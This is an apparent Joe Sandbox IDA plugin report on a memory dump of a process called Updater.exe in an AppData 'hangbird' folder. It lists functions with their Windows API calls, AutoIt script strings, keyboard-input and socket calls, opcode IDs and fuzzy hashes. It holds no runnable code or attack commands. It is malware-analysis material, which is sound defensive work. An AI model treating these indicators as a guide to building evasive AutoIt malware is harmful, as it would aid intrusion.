Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: b8e67a03960a4025d1e26d066f21252bc72cd27f7d58c0211529561c141465d2
Instruction ID: 4c068119aac95f6caf549190bb1d10ed2468d38e71f4409d7dd105e49fa45f2c
Opcode Fuzzy Hash: b8e67a03960a4025d1e26d066f21252bc72cd27f7d58c0211529561c141465d2
Instruction Fuzzy Hash: 8B415AB6A00219AFCB10EFA4CC85ADEBBF8EF49700F104195FA55B7191DA716E45CBA0

Function 00B337B5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 121windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B77F96

Part of subcall function 00B2F82C: _wcslen.LIBCMT ref: 00B2F83F

Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B338A8

Strings

AutoIt - , xrefs: 00B33819
Line %d: , xrefs: 00B78014

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line %d: $AutoIt -
API String ID: 2289894680-4094128768
Opcode ID: 4ed20de9a2deab62ecb52be66f836b19988a8f42aa2af9e8e347b31b265c8ce3
Instruction ID: 06f5157222dca6b52f61892318872f69807c392e4e7427a50a84da0c1a439edb
Opcode Fuzzy Hash: 4ed20de9a2deab62ecb52be66f836b19988a8f42aa2af9e8e347b31b265c8ce3
Instruction Fuzzy Hash: AD41D371008311AFD311EB60EC85AEF77E8AF44720F104ABAF599930A1EF749A48C796

Function 00B5154F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\hangbird\Updater.exe,00000104), ref: 00B5158A
_free.LIBCMT ref: 00B51655
_free.LIBCMT ref: 00B5165F

Strings

C:\Users\user\AppData\Local\hangbird\Updater.exe, xrefs: 00B51581, 00B51588, 00B515B7, 00B515EF

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\hangbird\Updater.exe
API String ID: 2506810119-2147348206
Opcode ID: 4a3152e046468ca317780240eedad41e7cc4e84428e2506ff3b555aa4237cbec
Instruction ID: 9f4f6ac524f8338c0644290a5567d1d875fd07432ed04bd7098374104b2c39ae
Opcode Fuzzy Hash: 4a3152e046468ca317780240eedad41e7cc4e84428e2506ff3b555aa4237cbec
Instruction Fuzzy Hash: 963172B1A01258EFDB21DF9DD885FAEBBFCEB85311B1444E6EC0597211EA708E48CB50

Function 00B8D017 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,?,00000000,?), ref: 00B8D0A0
DeleteMenu.USER32(?,00000007,00000000), ref: 00B8D0E6
DeleteMenu.USER32(00B8CBE8,?,00000000,00B8CBE8,00000000,00000000,?,00000000), ref: 00B8D12F

Strings

0, xrefs: 00B8D079

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: cffc840faa4c8fea70ac7945620bb47b815e4e7a4c05c7cd5301ec925cab53d7
Instruction ID: ff06b6a15d9c0f1d45f08d846605ee657beff4a91ceb252b2a6dd26a02f5f94b
Opcode Fuzzy Hash: cffc840faa4c8fea70ac7945620bb47b815e4e7a4c05c7cd5301ec925cab53d7
Instruction Fuzzy Hash: 6441C3702043029FD720EF24C885F5ABBE4EF85314F04469EF465A72E1D774E904CB62

Function 00BB4DDC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00BBD938,00000000,?,?,?,?), ref: 00BB4E70
GetWindowLongW.USER32 ref: 00BB4E8D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BB4E9D

Strings

SysTreeView32, xrefs: 00BB4E42

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: d0f8a603dc330408bc77e983a8bb44d58f72805e82a80d64bc14b105d41df74f
Instruction ID: ab7c42b2010a61a86f747787ab70c6b4d1eeff2d90eed3ac7fc3b7563c654b6f
Opcode Fuzzy Hash: d0f8a603dc330408bc77e983a8bb44d58f72805e82a80d64bc14b105d41df74f
Instruction Fuzzy Hash: 8E316D31200609AFDB258F38CC45BEA7BE9FB18324F204365F979932E1DBB4E8518B50

Function 00B8A36D Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B8A3DE

Strings

#requireadmin, xrefs: 00B8A39B
#notrayicon, xrefs: 00B8A378
#OnAutoItStartRegister, xrefs: 00B8A3B5

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 7113e9338e9ed32ba8d57aada6f35a5f5c1dee6194f51311c458b1e518fd7195
Instruction ID: d6804b2cd3fb30ebdf3faa5466e009a5387958efbaea8fde0706e12cefad24b3
Opcode Fuzzy Hash: 7113e9338e9ed32ba8d57aada6f35a5f5c1dee6194f51311c458b1e518fd7195
Instruction Fuzzy Hash: 1E213732110511AAE721B7249C46FBBB3D8DF51300F6884BBF942872A2FBA09D41D397

Function 00BB486F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00BB48F7
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00BB490B
SendMessageW.USER32(?,00001002,00000000,?), ref: 00BB492F

Strings

SysMonthCal32, xrefs: 00BB48C2

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 3890907c50ed25ac38431b4debc97b45fadb56bf7adb9e1247d6a8c09451041f
Instruction ID: dc3e01574d2ee8030496f32241571e052852d91e5242bd8b22e5efff49c0176e
Opcode Fuzzy Hash: 3890907c50ed25ac38431b4debc97b45fadb56bf7adb9e1247d6a8c09451041f
Instruction Fuzzy Hash: D8219F32600219BFDF218F54CC86FEA3BA9FF48724F110254FE596B1D1DBB5A8519BA0

Function 00BB5020 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00BB50D7
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00BB50E5
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00BB50EC

Strings

msctls_updown32, xrefs: 00BB5051

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: b04b97b46f33bfbf23cbf6271ee3aba657f3b06010116e8a1cbc287fec03c428
Instruction ID: 784c30452e9881a99230b5c8fc91bcaaf024707cdd36d43fe5e94ed64a75b757
Opcode Fuzzy Hash: b04b97b46f33bfbf23cbf6271ee3aba657f3b06010116e8a1cbc287fec03c428
Instruction Fuzzy Hash: BE2181B5600609AFDB20DF28CCC1DB737ECEF59394B504099FA019B2A1CBB1EC01CAA1

Function 00BB414F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00BB41D8
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00BB41E8
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00BB420E

Strings

Listbox, xrefs: 00BB41A7

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 69e844fcea3f20346f33afc069816390764e6f616020672500e67a69a0788fce
Instruction ID: 122e28a3f914d1ebe09607ee49ee27e1d7e99ad6f2c7df50a7dadfd4ac41869e
Opcode Fuzzy Hash: 69e844fcea3f20346f33afc069816390764e6f616020672500e67a69a0788fce
Instruction Fuzzy Hash: EF21AF32A10118BBDF118F58CC85EFB3BAEEF99754F118164F904AB191CBB1DC5287A0

Function 00B95594 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B955A8
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00B955FC
SetErrorMode.KERNEL32(00000000), ref: 00B95670

Strings

%lu, xrefs: 00B9560F

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 3de5b571f3eab4a71105370f8290be4ae9692e0c527a7a1582e4a048b3ca0dce
Instruction ID: ec3c131e926779ab3e26efa11638522b855d642588da319dcb02d598d4362a55
Opcode Fuzzy Hash: 3de5b571f3eab4a71105370f8290be4ae9692e0c527a7a1582e4a048b3ca0dce
Instruction Fuzzy Hash: 81315070A00109AFDB10DF54C985EAA77F8EF08304F1440E8F909DB262DB75EE45CB61

Function 00BB4BA4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00BB4C08
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00BB4C1D
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00BB4C2A

Strings

msctls_trackbar32, xrefs: 00BB4BDF

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: d98207933ef3586f4c0dffe62d9f16e586d496f6a7792dae1209fc358add64fe
Instruction ID: 01e6c071562fc00afa2814fae13c4b3ad7fe79b084570a6335eb3c1005f4facb
Opcode Fuzzy Hash: d98207933ef3586f4c0dffe62d9f16e586d496f6a7792dae1209fc358add64fe
Instruction Fuzzy Hash: 9911CE31240208BFEF205E29CC06FFB3BE8EF95B64F120624FA55E20A1D6B1D8119B20

Function 00B8111E Relevance: 6.3, APIs: 4, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf9d648d712d62e78a8b960147c2f6b7cd977bdad92b78f69ebd04271277ee0e
Instruction ID: caca6adf7a3783ff27dc0521ef71ba6f428fab3bc37bc0bd0b28c1834b78319a
Opcode Fuzzy Hash: cf9d648d712d62e78a8b960147c2f6b7cd977bdad92b78f69ebd04271277ee0e
Instruction Fuzzy Hash: 54C14C75A01206EFDB14DF98C884AAAB7F9FF48704F148999E905EB261D731ED42CB90

Function 00B612C1 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00B613F0

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: ebffb7cd37816736c4ab8f1e2bdbb635f0ecb427a66b56729ff1e2677a7d9340
Instruction ID: bdbebb63e7044e1284d7a86a2d7a339461db59a31c441025bf126614ae48cd5c
Opcode Fuzzy Hash: ebffb7cd37816736c4ab8f1e2bdbb635f0ecb427a66b56729ff1e2677a7d9340
Instruction Fuzzy Hash: 3E413B32A00100BBDB20BBBD8C8276E3AE4EF56371F1C4AD5F819D73A1EA384C045676

Function 00BB6C96 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(01370718,?), ref: 00BB6D05
ScreenToClient.USER32(?,?), ref: 00BB6D38
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00BB6DA5

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: b6047028d03f0729ca2335ee9545d43b7e00e5cbc7ab271d483d0aa4adea91b4
Instruction ID: e87026b6c296c83b4559123d3dd78cd2a1fd229091bb77831e4cec7374566fc9
Opcode Fuzzy Hash: b6047028d03f0729ca2335ee9545d43b7e00e5cbc7ab271d483d0aa4adea91b4
Instruction Fuzzy Hash: D6513D35A00209AFCB24DF64C880AFE7BF5EF44320F2081A9F9559B290D7B5ED41CB90

Function 00BA26B2 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00BA26D9
WSAGetLastError.WSOCK32 ref: 00BA26E7
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00BA2766
WSAGetLastError.WSOCK32 ref: 00BA2770

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: aefa3df0dfef8fcf8b8f2bc1964aa778a929d03e0eea119884ecf6c409b1f1fa
Instruction ID: 2523451e1902300dad9c7b2505309471d323659444f0fe19935019fc9f4e9d9b
Opcode Fuzzy Hash: aefa3df0dfef8fcf8b8f2bc1964aa778a929d03e0eea119884ecf6c409b1f1fa
Instruction Fuzzy Hash: 1641A274600210AFE720AF24D896F2A77E5EF05714F54C498F9199F2D3DA76DE41CB90

Function 00B5B24F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 376bc646445a3669fed3770add9900522623448d7508f0c685e0764e0b999798
Instruction ID: beb0391656f8f67b376233c8c70760f12cd332f9d1ad34ed098b365654a8dfd4
Opcode Fuzzy Hash: 376bc646445a3669fed3770add9900522623448d7508f0c685e0764e0b999798
Instruction Fuzzy Hash: 6441D872A00704AFD724AF78C841F6EBFE8EB85711F1045EAF915EB291D77299098B90

Function 00B5D6F3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,71E85006,00B46C9C,00000000,00000000,00B48204,?,00B48204,?,00000001,00B46C9C,71E85006,00000001,00B48204,00B48204), ref: 00B5D740
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B5D7C9
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00B5D7DB
__freea.LIBCMT ref: 00B5D7E4

Part of subcall function 00B5282E: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00B40445,?,?,00B2FA72,00000000,?,?,?,00B21188,?), ref: 00B52860

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: e865e2c052bec687166d99a69331a417e3a55c2996df50cd3f1b70a5f0a18520
Instruction ID: e18a842a4d9223a134af4685745289f5ffc7017885abaf1eec986af8a5d2c847
Opcode Fuzzy Hash: e865e2c052bec687166d99a69331a417e3a55c2996df50cd3f1b70a5f0a18520
Instruction Fuzzy Hash: 1931AE32A0020AABDF259F64DC85EAE7BE5EF48711F1402A8FC04D7151EB35DD54CB90

Function 00B8B89A Relevance: 6.1, APIs: 4, Instructions: 108keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00B8B8EF
SetKeyboardState.USER32(00000080), ref: 00B8B90B
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00B8B979
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00B8B9CB

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 790519dece7f54c9978a2f0a4ce26a4969b5ef42d2ff88bedc89e3caba02a2c3
Instruction ID: 9d79e219a616eade28aa9a33b112ce6fdb9b33f617b125b0265d88c401d2e509
Opcode Fuzzy Hash: 790519dece7f54c9978a2f0a4ce26a4969b5ef42d2ff88bedc89e3caba02a2c3
Instruction Fuzzy Hash: 51312870E44218AEFF34AB75CC05FFABBE5EB49320F08429AE685961F0D7748981D791

Function 00B8B9E1 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00B8BA36
SetKeyboardState.USER32(00000080,?,00008000), ref: 00B8BA52
PostMessageW.USER32(00000000,00000101,00000000), ref: 00B8BAB9
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00B8BB0B

